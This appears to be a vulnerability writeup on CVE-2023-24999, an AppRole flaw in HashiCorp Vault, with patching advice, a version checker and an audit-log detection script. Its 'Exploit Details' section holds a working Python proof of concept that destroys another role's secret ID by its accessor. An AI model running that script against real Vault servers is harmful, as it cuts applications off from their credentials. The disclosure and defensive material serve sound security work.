Recently, a critical vulnerability (CVE-2023-24999) was identified in the AppRole auth method of HashiCorp Vault and Vault Enterprise. The flaw allowed any authenticated user with access to an AppRole to destroy the secret ID of any other role, merely by providing that secret ID's accessor. Because applications depend on those secret IDs to log in, destroying them is an effective denial of service against every workload that authenticates through the affected roles, so the issue must be taken seriously and addressed accordingly. HashiCorp has released fixes in Vault versions 1.13.0, 1.12.4, 1.11.8 and 1.10.11, and later releases on each line.

Original References

The issue was disclosed by HashiCorp and assigned the identifier CVE-2023-24999. For more in-depth information on the vulnerability, see the following HashiCorp links:
- HashiCorp Security Advisory
- CVE Details Page on HashiCorp

Exploit Details

What made this vulnerability particularly concerning is that any authenticated user who could call the secret-id-accessor/destroy endpoint of some AppRole, even one with otherwise limited privileges, could destroy secret IDs belonging to other roles simply by supplying their accessors. A secret ID is the credential an application presents, together with its role ID, to log in through AppRole. Once a secret ID is destroyed it can no longer be used, so every application relying on it loses access to Vault until a new one is issued.

Consider this sample script, which destroys a secret ID by its accessor:

import os
import sys

import requests

def destroy_secret_id(vault_server, role_name, secret_id_accessor, token):
    # The endpoint CVE-2023-24999 concerns: destroy by accessor under a role the
    # caller is allowed to use. Before the fix, Vault did not check that the
    # accessor actually belonged to role_name, so any role's accessor was accepted.
    response = requests.post(
        f"{vault_server}/v1/auth/approle/role/{role_name}/secret-id-accessor/destroy",
        headers={"X-Vault-Token": token},
        json={"secret_id_accessor": secret_id_accessor},
    )
    # Vault answers 204 No Content on success; response.ok covers all 2xx codes
    if response.ok:
        print("Secret ID destroyed successfully.")
    else:
        print(f"Error destroying secret ID: HTTP {response.status_code} {response.text}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} VAULT_ADDR ROLE_NAME SECRET_ID_ACCESSOR")
    vault_server, role_name, secret_id_accessor = sys.argv[1:4]
    # The token is read from the environment rather than hard-coded in the script
    destroy_secret_id(vault_server, role_name, secret_id_accessor, os.environ["VAULT_TOKEN"])

The role named in the URL only has to be one on which the caller's token is allowed to call secret-id-accessor/destroy; the accessor in the request body can belong to any other role, and an unpatched Vault destroys that secret ID without checking ownership. Accessors are designed to be safe to handle (they are, for example, what listing a role's secret IDs returns), so a user with limited access who learns an accessor could wipe out the credentials of roles they have no access to at all.

Mitigation and Patching

To address this vulnerability, HashiCorp has released fixes in Vault versions 1.13.0, 1.12.4, 1.11.8 and 1.10.11. It is strongly recommended to update your Vault instances to one of these versions or a later release on the same line to ensure complete protection from this issue.
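To check a running cluster against those release numbers, here is an added script (not from the page or from HashiCorp) that reads the server version from the unauthenticated sys/health endpoint and compares it with the fixed releases listed above. The address is taken from the command line and defaults to http://127.0.0.1:8200, which is an assumption; the version strings in the comments are illustrative.

```python
"""Report whether a Vault server's version predates the CVE-2023-24999 fix.
Added example, not HashiCorp's code. Fixed releases are taken from the advisory."""
import json
import re
import sys
import urllib.error
import urllib.request

# Earliest patched release on each affected line; 1.13.0 and later are patched.
FIXED_PATCH = {(1, 10): 11, (1, 11): 8, (1, 12): 4}


def parse_version(version):
    """Reduce '1.12.3', '1.12.3+ent' or '1.12.3+ent.hsm' to (major, minor, patch)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised Vault version: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True if this version still ships the unchecked secret-id-accessor/destroy."""
    major, minor, patch = parse_version(version)
    if (major, minor) >= (1, 13):
        return False
    fixed = FIXED_PATCH.get((major, minor))
    if fixed is None:
        return True  # 1.9 and older lines were never patched on their own line
    return patch < fixed


def fetch_version(vault_addr):
    """Read the version from sys/health, which needs no token. Sealed or
    standby nodes answer with non-200 codes, but the body still carries it."""
    url = f"{vault_addr.rstrip('/')}/v1/sys/health"
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            body = resp.read()
    except urllib.error.HTTPError as err:
        body = err.read()
    return json.loads(body)["version"]


if __name__ == "__main__":
    # Assumed default address; pass VAULT_ADDR as the first argument otherwise
    addr = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8200"
    ver = fetch_version(addr)
    state = "VULNERABLE" if is_vulnerable(ver) else "patched"
    print(f"{addr} runs Vault {ver}: {state} for CVE-2023-24999")
```

The comparison is done per minor line on purpose: 1.10.11 is patched even though it is numerically older than the vulnerable 1.12.3, so a plain "newer than X" test would give the wrong answer for long-term lines.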

For those running HashiCorp Vault who are unable to update immediately, it is crucial to restrict and monitor access to the secret-ID endpoints. Grant update on auth/approle/role/<role>/secret-id-accessor/destroy and auth/approle/role/<role>/secret-id/destroy only to the identity that administers that role, keep other AppRole consumers to the role-id and secret-id paths they actually need, and watch the audit log for calls to the destroy paths, since any such call on an unpatched server may be acting on a different role's secret ID.
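As an added illustration of that monitoring (this is not code from the page or from HashiCorp), the script below scans Vault file-audit-device entries for calls to either AppRole destroy path and reports who made them, from where, and through which role. The audit lines are constructed for the example; note that the audit device HMACs request data, so the accessor in the body cannot be mapped back to its owning role from the log alone, which is why every destroy call is surfaced and callers that destroy repeatedly are counted.

```python
"""Flag AppRole secret-ID destruction in a Vault file audit log.
Added example; the log lines below are constructed, not real captures."""
import json
import re
from collections import Counter

# Both destroy endpoints, with the role name captured. The secret-id-accessor
# form is the one CVE-2023-24999 concerns.
DESTROY_RE = re.compile(r"^auth/approle/role/([^/]+)/secret-id(-accessor)?/destroy$")

# Constructed sample: one secret-id issuance, two destroys by the same token
# (one by accessor, one by secret ID), the matching response entry, and a role-id read.
SAMPLE_AUDIT = """
{"time":"2023-03-10T11:02:07Z","type":"request","auth":{"display_name":"approle-ci","accessor":"hmac-sha256:aa11","policies":["default","ci-approle"]},"request":{"id":"r1","operation":"update","path":"auth/approle/role/ci/secret-id","remote_address":"10.0.4.12"}}
{"time":"2023-03-10T11:05:41Z","type":"request","auth":{"display_name":"token-dev","accessor":"hmac-sha256:bb22","policies":["default","dev-approle"]},"request":{"id":"r2","operation":"update","path":"auth/approle/role/dev/secret-id-accessor/destroy","remote_address":"10.0.9.77","data":{"secret_id_accessor":"hmac-sha256:cc33"}}}
{"time":"2023-03-10T11:05:42Z","type":"response","auth":{"display_name":"token-dev","accessor":"hmac-sha256:bb22","policies":["default","dev-approle"]},"request":{"id":"r2","operation":"update","path":"auth/approle/role/dev/secret-id-accessor/destroy","remote_address":"10.0.9.77"},"response":{}}
{"time":"2023-03-10T11:06:03Z","type":"request","auth":{"display_name":"token-dev","accessor":"hmac-sha256:bb22","policies":["default","dev-approle"]},"request":{"id":"r3","operation":"update","path":"auth/approle/role/dev/secret-id/destroy","remote_address":"10.0.9.77","data":{"secret_id":"hmac-sha256:dd44"}}}
{"time":"2023-03-10T11:06:09Z","type":"request","auth":{"display_name":"token-dev","accessor":"hmac-sha256:bb22","policies":["default","dev-approle"]},"request":{"id":"r4","operation":"read","path":"auth/approle/role/dev/role-id","remote_address":"10.0.9.77"}}
""".strip()


def destroy_events(lines):
    """Return one record per destroy call found in the audit lines."""
    events = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        entry = json.loads(raw)
        if entry.get("type") != "request":  # count each call once, not its response too
            continue
        req = entry.get("request", {})
        m = DESTROY_RE.match(req.get("path", ""))
        if not m or req.get("operation") != "update":
            continue
        auth = entry.get("auth", {})
        events.append({
            "time": entry.get("time"),
            "role": m.group(1),                 # role named in the URL, not necessarily the victim
            "by_accessor": m.group(2) is not None,
            "caller": auth.get("display_name"),
            "token_accessor": auth.get("accessor"),
            "policies": auth.get("policies", []),
            "remote_address": req.get("remote_address"),
        })
    return events


def bulk_destroyers(events, threshold=2):
    """Token accessors that destroyed at least `threshold` secret IDs."""
    counts = Counter(e["token_accessor"] for e in events)
    return {acc: n for acc, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    evs = destroy_events(SAMPLE_AUDIT.splitlines())
    for e in evs:
        how = "accessor" if e["by_accessor"] else "secret ID"
        print(f"{e['time']} {e['caller']} from {e['remote_address']} destroyed a secret ID "
              f"by {how} via role '{e['role']}' with policies {e['policies']}")
    print("callers destroying repeatedly:", bulk_destroyers(evs))
```

Point the same functions at the real audit file (one JSON object per line) and feed the records to whatever alerting you use; the useful triage fields are the caller's policies and remote address, which tell you whether that token should be touching secret IDs at all.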

Conclusion

CVE-2023-24999 exposed a serious flaw in the AppRole auth method of HashiCorp Vault and Vault Enterprise. By letting any authenticated user with access to one role destroy the secret IDs of other roles, it put the availability of every application that authenticates through AppRole at risk. The updates released by HashiCorp address the issue. As a best practice, keep your Vault instances up to date, grant the secret-ID destroy paths only to the identities that administer each role, and monitor access to them.

Timeline

Published on: 03/11/2023 00:15:00 UTC
Last modified on: 05/05/2023 20:15:00 UTC